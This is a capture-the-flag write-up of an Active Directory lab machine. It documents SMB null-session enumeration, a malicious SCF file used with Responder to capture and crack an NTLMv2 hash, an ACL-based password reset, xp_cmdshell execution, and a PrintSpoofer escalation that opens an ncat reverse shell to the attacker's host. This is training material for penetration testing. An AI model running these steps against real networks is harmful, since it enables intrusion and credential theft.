Share The Pain
Active Directory Machine
Share The Pain
Enumaration
The first thing to do is run an Nmap scan to identify the open ports and services.
From the scan results, we can observe that we are dealing with an Active Directory environment, which is essentially the core idea of this challenge.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
$ sudo nmap --top-ports=1000 10.1.125.195 -sCV
Nmap scan report for DC01.hack.smarter (10.1.125.195)
Host is up (0.16s latency).
Not shown: 987 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-06-20 13:28:24Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hack.smarter0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hack.smarter0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-06-20T13:28:42+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: HACK
| NetBIOS_Domain_Name: HACK
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: hack.smarter
| DNS_Computer_Name: DC01.hack.smarter
| DNS_Tree_Name: hack.smarter
| Product_Version: 10.0.20348
|_ System_Time: 2026-06-20T13:28:33+00:00
| ssl-cert: Subject: commonName=DC01.hack.smarter
| Not valid before: 2026-06-18T23:38:02
|_Not valid after: 2026-12-18T23:38:02
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2026-06-20T13:28:35
|_ start_date: N/A
The challenge does not provide us with a foothold, which means that gaining a foothold is our mission.
Since we do not have any credentials yet, we can try Null Authentication. The first service worth testing is SMB, and we can use NetExec to check it.
1
2
3
4
> nxc smb 10.1.125.195 -u '' -p ''
SMB 10.1.125.195 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hack.smarter) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.125.195 445 DC01 [+] hack.smarter\:
The NetExec output confirms that Null Authentication is enabled. Now, let’s check if there are any available SMB shares to enumerate.
1
2
3
4
5
6
7
8
9
10
11
12
13
> nxc smb 10.1.125.195 -u '' -p '' --shares
SMB 10.1.125.195 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hack.smarter) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.125.195 445 DC01 [+] hack.smarter\:
SMB 10.1.125.195 445 DC01 [*] Enumerated shares
SMB 10.1.125.195 445 DC01 Share Permissions Remark
SMB 10.1.125.195 445 DC01 ----- ----------- ------
SMB 10.1.125.195 445 DC01 ADMIN$ Remote Admin
SMB 10.1.125.195 445 DC01 C$ Default share
SMB 10.1.125.195 445 DC01 IPC$ Remote IPC
SMB 10.1.125.195 445 DC01 NETLOGON Logon server share
SMB 10.1.125.195 445 DC01 Share READ,WRITE
SMB 10.1.125.195 445 DC01 SYSVOL Logon server share
Enumerating the available shares reveals that the share Share grants us both READ and WRITE permissions.
Ensure that the target domain name is added to the
/etc/hostsfile.
1
YourIP DC01.hack.smarter hack.smarter DC01
Also, it can be generated using nxc.
1
2
3
4
5
6
7
> nxc smb 10.1.125.195 -u '' -p '' --generate-hosts-file host
SMB 10.1.125.195 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hack.smarter) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.125.195 445 DC01 [+] hack.smarter\:
> cat host
10.1.125.195 DC01.hack.smarter hack.smarter DC01
Gaining Foothold
Since we are dealing with an Active Directory environment, we know that Windows machines are present on the network. A well-known technique in this scenario is to upload a malicious SCF (Shell Command File) to a writable SMB share. When any user browses the share using Windows Explorer, the SCF file is automatically executed without any interaction, forcing the victim’s machine to authenticate against our machine. By setting up Responder to act as a rogue authentication server, we can capture the NTLMv2 hash of the user who browsed the share.
- First we creat a malicious scf that contains a unc path pointing back to our machine IP address.
1
2
3
4
5
[Shell]
Command=2
IconFile=\\<YourVpnIP>\share\icon.ico
[Taskbar]
Command=ToggleDesktop
- We upload the scf file to the writable Share.
1
2
3
4
5
6
7
8
9
10
11
12
> smbclient //10.1.125.195/Share -N
Try "help" to get a list of possible commands.
smb: \> put sys.scf
putting file sys.scf as \sys.scf (0.2 kb/s) (average 0.2 kb/s)
smb: \> dir
. D 0 Sat Jun 20 10:10:37 2026
.. DHS 0 Fri Sep 5 23:46:21 2025
link.url A 110 Fri Jun 19 20:25:13 2026
sys.scf A 90 Sat Jun 20 10:10:38 2026
31292671 blocks of size 4096. 27255238 blocks available
smb: \>
- Then we run Responder on our VPN interface to act as a rogue SMB server and intercept any incoming authentication attempts.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
> sudo responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-4B8Q6OQDKK4]
Responder Domain Name [U02K.LOCAL]
Responder DCE-RPC Port [48947]
[+] Listening for events...
[*] Skipping previously captured hash for HACK\bob.ross
[*] Skipping previously captured hash for HACK\bob.ross
[*] Skipping previously captured hash for HACK\bob.ross
[*] Skipping previously captured hash for HACK\bob.ross
[*] Skipping previously captured hash for HACK\bob.ross
[*] Skipping previously captured hash for HACK\bob.ross
Shortly after, Responder successfully captures the NTLMv2 hash of the user bob.ross, which is saved in Responder’s log directory at /usr/share/responder/logs/.
1
2
> cat /usr/share/responder/logs/SMB-NTLMv2-SSP-10.1.125.195.txt
bob.ross::HACK:5361....
We can attempt to crack this hash offline using hashcat.
1
2
> hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --show
BOB.ROSS::HACK:5361e93....:13***************
Now we got a domain users !
Compromising alice.wonderland
I performed a quick ACL scan using my tool and found the following information
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
> python3 aclhug.py -u 'bob.ross' -p '13***************' --dc-ip 10.1.125.195 -d hack.smarter
AD ACL Hunter
Time : 2026-06-20 11:55:42 EDT
User : bob.ross
Domain : hack.smarter
DC IP : 10.1.125.195
Base DN : DC=HACK,DC=SMARTER
[*] Connecting...
[+] Connection established
[*] Resolving 'bob.ross'...
[+] SID : S-1-5-21-3782576407-3043698477-3578684825-1103
[+] DN : CN=bob.ross,CN=Users,DC=hack,DC=smarter
[+] Type : User
[*] Paged ACL scan (page_size=500)...
[*] Scanning 249 objects for SID S-1-5-21-3782576407-3043698477-3578684825-1103...
[████████████████████] 100% (249/249)
════════════════════════════════════════════════════════════════════════════════
🎯 ACL Results › bob.ross [user]
Summary: 🔴 CRITICAL: 1 🟠 HIGH: 1
🔴 CRITICAL GenericAll
Target : alice.wonderland [top | person | organizationalperson | user]
DN : CN=alice.wonderland,CN=Users,DC=hack,DC=smarter
Rights : GenericAll
Technique : Full Object Control — read, write, delete, change owner, modify DACL
Methods : force-change-password, add-member, write-dacl, take-ownership, shadow-credentials, set-spn, set-rbcd, set-primary-group, set-scriptpath, write-property
Attack : Exploit any of the listed methods. GenericAll = complete account
takeover.
ACE Type : ACCESS_ALLOWED_ACE
🟠 HIGH WriteOwner
Target : alice.wonderland [top | person | organizationalperson | user]
DN : CN=alice.wonderland,CN=Users,DC=hack,DC=smarter
Rights : WriteOwner
Technique : Take Ownership — become object owner, then modify DACL freely
Methods : take-ownership → write-dacl → full-control
Attack : Set yourself as owner, grant WriteDacl, grant GenericAll.
ACE Type : ACCESS_ALLOWED_ACE
════════════════════════════════════════════════════════════════════════════════
From the output, we can observe that our foothold user bob.ross has GenericAll and WriteOwner privileges over alice.wonderland. Therefore, we can force a password change on alice.wonderland using tools such as bloodyAD.
1
2
> bloodyAD --host 10.1.125.195 -d hack.smarter -u 'bob.ross' -p '13***************' set password alice.wonderland 'Password@123'
[+] Password changed successfully!
Checking …
1
2
3
> nxc smb 10.1.125.195 -u 'alice.wonderland' -p 'Password@123'
SMB 10.1.125.195 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hack.smarter) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.125.195 445 DC01 [+] hack.smarter\alice.wonderland:Password@123
I checked again using my tool whether alice.wonderland holds any dangerous rights over other users, but no rights were detected.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
> python3 aclhug.py -u 'bob.ross' -p '13***************' --dc-ip 10.1.125.195 -d hack.smarter -t alice.wonderland
AD ACL Hunter
Time : 2026-06-20 12:07:11 EDT
User : bob.ross
Domain : hack.smarter
DC IP : 10.1.125.195
Base DN : DC=HACK,DC=SMARTER
[*] Connecting...
[+] Connection established
[*] Resolving 'alice.wonderland'...
[+] SID : S-1-5-21-3782576407-3043698477-3578684825-1104
[+] DN : CN=alice.wonderland,CN=Users,DC=hack,DC=smarter
[+] Type : User
[*] Paged ACL scan (page_size=500)...
[*] Scanning 249 objects for SID S-1-5-21-3782576407-3043698477-3578684825-1104...
[████████████████████] 100% (249/249)
════════════════════════════════════════════════════════════════════════════════
🎯 ACL Results › alice.wonderland [user]
✔ No dangerous rights found.
════════════════════════════════════════════════════════════════════════════════
However, alice.wonderland is a member of the Remote Management Users group, which means we can access the machine remotely via WinRM or RDP.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
> python3 aclhug.py -u 'bob.ross' -p '13***************' --dc-ip 10.1.125.195 -d hack.smarter --member-of alice.wonderland
AD ACL Hunter
Time : 2026-06-20 12:07:29 EDT
User : bob.ross
Domain : hack.smarter
DC IP : 10.1.125.195
Base DN : DC=HACK,DC=SMARTER
[*] Connecting...
[+] Connection established
[*] Resolving memberships for 'alice.wonderland'...
════════════════════════════════════════════════════════════════════════════════
🔑 Group Memberships › alice.wonderland
Remote Management Users CN=Remote Management Users,CN=Builtin,DC=hack,DC=smarter
════════════════════════════════════════════════════════════════════════════════
User Flag
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
> evil-winrm -i 10.1.125.195 -u alice.wonderland -p 'Password@123'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\alice.wonderland\Documents> cd ..
*Evil-WinRM* PS C:\Users\alice.wonderland> cd Desktop
*Evil-WinRM* PS C:\Users\alice.wonderland\Desktop> dir
Directory: C:\Users\alice.wonderland\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/3/2025 2:07 PM 54 user.txt
Lateral Movement via MSSQL Code Execution
While enumerating the system, I found several indicators suggesting that an MSSQL service is running on this machine.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
*Evil-WinRM* PS C:\> dir "Program Files"
Directory: C:\Program Files
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/5/2025 8:45 PM Amazon
d----- 9/2/2025 2:10 PM Common Files
d----- 3/2/2022 7:58 PM Internet Explorer
d----- 9/3/2025 2:07 PM Microsoft
d----- 9/3/2025 2:07 PM Microsoft SQL Server
d----- 9/3/2025 2:07 PM Microsoft Visual Studio 10.0
d----- 9/3/2025 2:07 PM Microsoft.NET
d----- 5/8/2021 1:20 AM ModifiableWindowsApps
d----- 9/2/2025 7:26 PM PackageManagement
d----- 9/5/2025 8:33 PM VMware
d----- 9/2/2025 6:54 PM Windows Defender
d----- 3/2/2022 7:58 PM Windows Defender Advanced Threat Protection
d----- 3/2/2022 7:58 PM Windows Mail
d----- 3/2/2022 7:58 PM Windows Media Player
d----- 5/8/2021 2:35 AM Windows NT
d----- 3/2/2022 7:58 PM Windows Photo Viewer
d----- 9/2/2025 7:26 PM WindowsPowerShell
1
2
3
4
5
6
7
8
9
*Evil-WinRM* PS C:\> dir "Temp"
Directory: C:\Temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/3/2025 2:01 PM 6379936 SQLEXPRESS.exe
By enumerating the listening TCP ports, we identified an MSSQL service running on this computer.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
*Evil-WinRM* PS C:\Users\alice.wonderland\Documents> netstat -ano | findstr LISTENING
TCP 0.0.0.0:88 0.0.0.0:0 LISTENING 688
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 932
TCP 0.0.0.0:389 0.0.0.0:0 LISTENING 688
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:464 0.0.0.0:0 LISTENING 688
TCP 0.0.0.0:593 0.0.0.0:0 LISTENING 932
TCP 0.0.0.0:636 0.0.0.0:0 LISTENING 688
TCP 0.0.0.0:3268 0.0.0.0:0 LISTENING 688
TCP 0.0.0.0:3269 0.0.0.0:0 LISTENING 688
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 396
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:9389 0.0.0.0:0 LISTENING 3244
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 688
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 580
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1180
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 688
TCP 0.0.0.0:49671 0.0.0.0:0 LISTENING 2024
TCP 0.0.0.0:49674 0.0.0.0:0 LISTENING 2580
TCP 0.0.0.0:49677 0.0.0.0:0 LISTENING 688
TCP 0.0.0.0:49678 0.0.0.0:0 LISTENING 1576
TCP 0.0.0.0:49681 0.0.0.0:0 LISTENING 2828
TCP 0.0.0.0:49699 0.0.0.0:0 LISTENING 668
TCP 0.0.0.0:49710 0.0.0.0:0 LISTENING 3336
TCP 0.0.0.0:49776 0.0.0.0:0 LISTENING 3352
TCP 10.1.125.195:53 0.0.0.0:0 LISTENING 3336
TCP 10.1.125.195:139 0.0.0.0:0 LISTENING 4
TCP 127.0.0.1:53 0.0.0.0:0 LISTENING 3336
TCP 127.0.0.1:1433 0.0.0.0:0 LISTENING 4152 <--------
We can interact with the MSSQL service with ease, as the sqlcmd tool is already installed on the machine.
We do not have credentials for the MSSQL service account, however, sqlcmd provides the -E flag, which enables a trusted connection using current windows session credentials.
1
2
3
4
5
6
7
*Evil-WinRM* PS C:\Users\alice.wonderland\Documents> sqlcmd -S 127.0.0.1 -E -Q "SELECT name FROM master.dbo.sysdatabases"
name
--------------------------------------------------------------------------------------------------------------------------------
master
tempdb
model
msdb
MSSQL provides the ability to execute OS commands using xp_cmdshell, which runs under the security context of the SQL Server service account. In this scenario, xp_cmdshell was found to be enabled by default, however, if it is not enabled, it can be activated manually.
1
2
3
4
5
*Evil-WinRM* PS C:\Users\alice.wonderland\Documents> sqlcmd -S 127.0.0.1 -E -Q "xp_cmdshell 'whoami'"
output
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
nt service\mssql$sqlexpress
NULL
Now, let’s obtain a reverse shell as service\mssql$sqlexpress using a Base64-encoded PowerShell payload.
1
2
3
4
5
6
7
> nc -nlvp 7777
Listening on 0.0.0.0 7777
Connection received on 10.1.125.195 50202
PS C:\Windows\system32> whoami
nt service\mssql$sqlexpress
PS C:\Windows\system32>
Escalate our Privileges
As observed, the mssql$sqlexpress service account has several interesting privileges, most notably SeImpersonatePrivilege. This privilege can typically be abused using JuicyPotato to escalate privileges, however, JuicyPotato is not compatible with Windows Server 2022.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
PS C:\Windows\system32> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
An alternative exploitation path is to abuse the Print Spooler service, provided that it is actively running on the target system.
1
2
3
4
5
PS C:\Windows\system32> Get-Service -Name Spooler
Status Name DisplayName
------ ---- -----------
Running Spooler Print Spooler
The output confirms that the Print Spooler service is actively running on the target
system, making it a viable privilege escalation vector.
At this stage, two tools need to be transferred to the target system in order to proceed with the exploitation:
PrintSpoofer: the exploit binary used to abuse the SeImpersonatePrivilege.
Ncat: used to establish a reverse shell as NT AUTHORITY\SYSTEM
Both tools can be downloaded by clicking on it !
1
2
3
4
5
6
7
8
9
10
11
12
13
PS C:\Temp> curl http://VpnIP:8000/PrintSpoofer.exe -O PrintSpoofer.exe
PS C:\Temp> curl http://VpnIP:8000/nc.exe -O nc.exe
PS C:\Temp> dir
Directory: C:\Temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/20/2026 11:53 AM 38616 nc.exe
-a---- 6/20/2026 11:53 AM 27136 PrintSpoofer.exe
-a---- 9/3/2025 2:01 PM 6379936 SQLEXPRESS.exe
First, we set up an additional listener to receive the incoming connection.
1
2
> nc -nlvp 4444
Listening on 0.0.0.0 4444
We then execute the exploit against the target service.
1
2
3
4
PS C:\Temp> .\PrintSpoofer.exe -c "nc.exe YourVpnIP 4444 -e cmd"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Finally, we obtain a shell session on the Domain Controller machine account, running as hack\dc01$, with highly elevated privileges within the Active Directory environment.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
C:\Windows\system32>whoami
whoami
hack\dc01$
C:\Windows\system32>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
Root Flag
To complete the challenge, we retrieve the root flag from the Administrator Desktop
1
2
3
4
5
6
7
8
9
10
11
12
13
C:\Windows\system32>dir c:\Users\Administrator\Desktop
dir c:\Users\Administrator\Desktop
Volume in drive C has no label.
Volume Serial Number is 70F9-CC7D
Directory of c:\Users\Administrator\Desktop
09/06/2025 08:52 PM <DIR> .
09/03/2025 07:47 PM <DIR> ..
09/02/2025 06:46 PM 2,308 Microsoft Edge.lnk
09/03/2025 02:10 PM 126 root.txt
2 File(s) 2,434 bytes
2 Dir(s) 111,489,622,016 bytes free
This post is licensed under
CC BY 4.0
by the author.